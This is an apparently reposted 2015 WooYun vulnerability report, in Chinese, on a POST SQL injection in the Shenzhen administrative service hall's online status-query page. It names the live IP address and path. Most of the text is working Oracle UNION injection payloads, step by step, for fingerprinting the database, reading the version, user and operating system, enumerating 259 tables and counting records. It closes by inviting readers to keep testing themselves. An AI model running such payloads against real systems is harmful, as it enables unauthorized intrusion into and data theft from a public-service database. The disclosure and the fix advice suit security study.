记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

深圳市行政服务大厅官网一处POST注入(Oracle Union纯手工测试技巧)

2015-09-07 04:15

深圳市行政服务大厅网上办事系统的办事状态查询

URL:

code 区域
http://61.144.227.35/main/gb/adminhall/szzwresult.jsp



POST:

code 区域
field2=201502163000016



输入任意数据的时候提示出错,回执编号可以在首页上面看到,如图:

0721_0.png



正常POST访问页面为:

0721_8.png



工具没跑出数据来。。。只能手工。。。。

看截图:

0721_11.png



下面手工测试:

判断数据库,在一番测试后最后判定是Oracle,判断数据:

code 区域
field2=201502163000016' and  0<>(select count(*) from dual) --



判断字段长度,提交:

code 区域
field2=201502163000016' order by 17--

页面正常。。。

直接union,由于oracle的字段敏感性,类型必须一一对应,只能提交:

code 区域
field2=201502163000016' UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--

页面正常

紧接着判断字段,逐一排除,最终提交:

code 区域
field2=201502163000016'  UNION SELECT '1','2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--

0721_4.png

可用字段:1,5,9

接下来就是直接Union的过程:

1、看看版本:

code 区域
field2=201502163000016'  UNION SELECT '11'||((select banner from sys.v_$version where rownum=1)),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--

0721_5.png



2、看看当前连接用户名:

code 区域
field2=201502163000016'  UNION SELECT '11'||((select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--



3、判断操作系统

code 区域
field2=201502163000016'  UNION SELECT '11'||((select member from v$logfile where rownum=1)),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--



结果:

code 区域
H:\ORADATA\SZGOV92\REDO01.LOG

是windows系统。。。

4、表,一共有259张表:

code 区域
field2=201502163000016' and (select count (*) from user_tables)=259 and 'kKTd'='kKTd

0721_2.png



5、表名:

code 区域
field2=201502163000016'  UNION SELECT '11'||TABLE_NAME,'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from (select A.*,rownum rn from (select * from USER_TABLES) A where rownum<2) where rn>0--



第一张表:

code 区域
MEMBER_ACCOUNT



其他表类似。。。

写个程序跑出表,最后出来的表为(259张):

code 区域
MEMBER_ACCOUNT

MEMBER_ENTERPRISE

MEMBER_MESSAGE

ARTICLESOURCE

ARTICLETOPIC

ARTICLEUSER

ARTICLE_RELATE_WORD

ARTICLE_STAT

BANS_BANNERINFO

BANS_GROUP

BANS_STATE

BBS_ARTICLE

PROFILE_CATALOG

PROFILE_MESSAGE

PROFILE_NOTEBOOK

PROFILE_SETTING

PROFILE_SYSTEM

PROFILE_TYPE

PROFILE_USER

PROFILE_USER_MESSAGE

PUBLISH_CATALOG

RESOURCES

RESOURCES_CONNECTION

RESOURCES_RELATE

RIGHTS_OBJECTS

BBS_BANK

BBS_BOARD

BBS_USER

CATALOG_FILE_OUT

CATALOG_PAGE

CATALOG_PLUGIN

RIGHTS_OPTIONS

RIGHTS_PERMISSIONS

RIGHTS_ROLES

RIGHTS_ROLE_OBJ

RIGHTS_ROLE_USER

RIGHTS_USERS

RIGHTS_USER_ACTIONTIME

RIGHTS_USER_OBJ

RIGHTS_USER_SHARE

RIGHTS_USER_TRANSFER

SERVICE

SETTING

SIGNS

SIGN_TYPE

SITE

CATALOG_RELATION

SITE_MENUBAR

SITE_STAT

SITE_STATE

SITE_TEMPLATE

SITE_TEMPLATE_PROFILE

SITE_USER

STAT_DAY

STAT_FADDRESS

STAT_FAREA

STAT_FBROWSER

STAT_FIP

STAT_FIPONE

STAT_FIPTWO

STAT_FMOZILLA

STAT_FREFER

STAT_FSCREEN

STAT_FSYSTEM

STAT_FVISIT

STAT_FWEBURL

STAT_INFOLIST

STAT_IPINFO

STAT_IPSCOPE

STAT_MONTH

STAT_STATDAY

STAT_STATMONTH

STAT_STATWEEK

STAT_STATYEAR

EXCHANGE_TEMP_CK

EXCHANGE_TEMP_DTFBXX

EXCHANGE_TEMP_DW

FEEDBACK

FEEDBACK_TYPE

HOMEPAGE_CATALOG

HOT_CATALOG

INQUIRY_ANSWER_COUNT

INQUIRY_QUESTION

INQUIRY_QUESTION_ANSWER

INQUIRY_QUESTION_TYPE

INQUIRY_TOME

INQUIRY_TOME_QUESTION

INQUIRY_USER

INQUIRY_USER_ANSWER

INQUIRY_USER_ANSWER_BAK

INQUIRY_USER_RESULT

LAW

LIBRARY_INFOSTYLE

LIBRARY_ITEM

LIBRARY_TABLEINFO

EXCHANGE_IN_HIST_EMAIL_DTFBXX

EXCHANGE_IN_MYDDCWT

EXCHANGE_IN_MYDDCXZSM

EXCHANGE_IN_TEMP_CK

EXCHANGE_IN_TEMP_CKSX

EXCHANGE_IN_TEMP_DTFBXX

EXCHANGE_IN_TEMP_DW

EXCHANGE_IN_TEMP_EMAIL_BJZT

EXCHANGE_IN_TEMP_EMAIL_DTFBXX

EXCHANGE_LAW

EXCHANGE_LAW_BAK

EXCHANGE_LAW_CATALOG

EXCHANGE_MYDDCXZSM

EXCHANGE_ORGANIZATION_BAK

EXCHANGE_RESOURCES_CONNECTION

EXCHANGE_TEMP_BLSX

EXCHANGE_ORGANIZATION

YWTJ

XZXKBLJG

LAW_NEW

EXCHANGE_TEMP_BJZT_NEW

EXCHANGE_TEMP_DTFBXX_NEW

EXCHANGE_IN_TEMP_BJZT_0426

EXCHANGE_IN_TEMP_BJZT

DOCUMENT

DOCUMENT_UPLOAD

EMAGAZINE

EMAG_ARTICLE

EMAG_COLUMN

EMAG_ISSUE

EMAG_ISSUE_COLUMN

EVENTLOG

EXCHANGE_DCDA

EXCHANGE_DEAL

WUBIN

TEMP_TOTALCNT

TEMP_IN_TOTALCNT

EXCHANGE_DEAL_CATALOG

EXCHANGE_FILE

EXCHANGE_IN_DCDA

EXCHANGE_IN_HIST_EMAIL_BJZT

BBS_CATALOG

BBS_IP

BBS_KEYWORD

BBS_NOTICE

BBS_REPLY_MAN

BUILD_TEMPLATE

CASES

CASE_REPLY

CASE_TRADE

CASE_USER

CATALOG

CATALOG_FILE

CATALOG_USER

CT

DEAL

DECLARES

DECLARE_STATE

DICTIONARY

DICTIONARY_TYPE

ARTICLE

ARTICLEFOLDER

ARTICLEKEYWORD

ARTICLEREAD

ARTICLEREJECT

ARTICLEVIEW

BANNER_TYPE

BANS_BANNERSTATS

BANS_DAYSTATS

BANS_DEFAULT_BANNER

EXCHANGE_TEMP_CKSX

T_ERRORMSG

USER_DEPT

USER_DOC_SHARE

USER_GROUP

USER_GROUP_MEMBER

USER_ONLINE

EXCHANGE_TEMP_BJZT

TEMP1

COMPLAIN

DEAL_TEST

DEAL2

EXCHANGE_IN_TEMP_BLSX

SUGGESTION_ROLE

SUGGESTION_ZXWY

SURVEYANSWERS

SURVEYLOGSCOOKIE

SURVEYLOGSIP

SURVEYQUESTIONS

SURVEYQUESTIONS_KIND

TAB_96666BOX

TAB_DEPBRANCH

TAB_DEPINFO

TAB_DEPINFO2

TAB_LEADERINFO

TAB_STAFFINFO

TAB_UP_BRANCH

TEMPLATE

TEMPLATE_BAK

TEMPLATE_CATALOG

TEMPLATE_CATALOG_NOUSE

TEMPLATE_LIB_NOUSE

TEMPLATE_WEBPART

TOURIST_ARTICLE

MEMBER_MESSAGE_OWNER

MEMBER_PERSON

MEMBER_PROFILE

MEMBER_PROFILE_CATALOG

MEMBER_SIGNUP

MEMBER_TYPE

MESSAGE

MESSAGE_TYPE

NET_APPLY

NET_ARTICLE

NET_ARTICLE_TYPE

NORMALINFO_LIST

NORMALINFO_LISTTYPE

ONLINEUSER

OPTION_REPLY

OPTION_TITLE

PHOTO_LIB

PHOTO_TYPE

PLAN_TABLE

PLUGIN

PLUGIN_PROFILE

PORTAL_USER

PROCDESCRIP

PROFILE

STAT_VISITOR

STAT_VISITTIME

STAT_WEEK

STAT_YEAR

SUGGESTION

SUGGESTION_AUTHDEPTCOMMENT

SUGGESTION_CATAGORY

SUGGESTION_CLERKINFO

SUGGESTION_COMMISSARY

SUGGESTION_COMMISSARYINFO

SUGGESTION_DEPARTMENTINFO

SUGGESTION_DEPARTMENTTYPE

SUGGESTION_FILETYPE

SUGGESTION_HISTORY

SUGGESTION_RDDB

EXCHANGE_MYDDCWT

EXCHANGE_RESOURCES_CON_BAK

LIBRARY_TYPE

LINK

LINK_TYPE

LIVE_ARTICLE

LIVE_ROLE

LIVE_TOPIC

LIVE_WORD

MAILBOX_ARTICLE

MAILBOX_ARTICLE_OPERATOR

MAILBOX_FLOW

MAILBOX_FLOW_OPERATOR

MAILBOX_FLOW_PROCESS

MAILBOX_OPERATION

MAILBOX_RIGHT

MAILBOX_TYPE

MAILLIST

MAILLISTMSG

MAILLISTMSGHIS

MAILLISTSUBSCRIBE



6、看看表里记录条数:

code 区域
field2=201502163000016'  UNION SELECT '11'||count(*),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from INQUIRY_USER--



0721_10.png

code 区域
5397条记录



提交:

code 区域
field2=201502163000016'  UNION SELECT '11'||count(*),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from EXCHANGE_IN_TEMP_BJZT--



0721_12.png

code 区域
6313588条记录



好了。。。到此吧

其他信息不跑了。。。你们自己测吧。。。

漏洞证明:

0721_2.png

0721_4.png

0721_5.png

0721_10.png

0721_12.png

声明:未做任何破坏性操作!

修复方案:

过滤参数

加WAF


知识来源: www.wooyun.org/bugs/wooyun-2015-0128168

阅读:146783 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“深圳市行政服务大厅官网一处POST注入(Oracle Union纯手工测试技巧)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云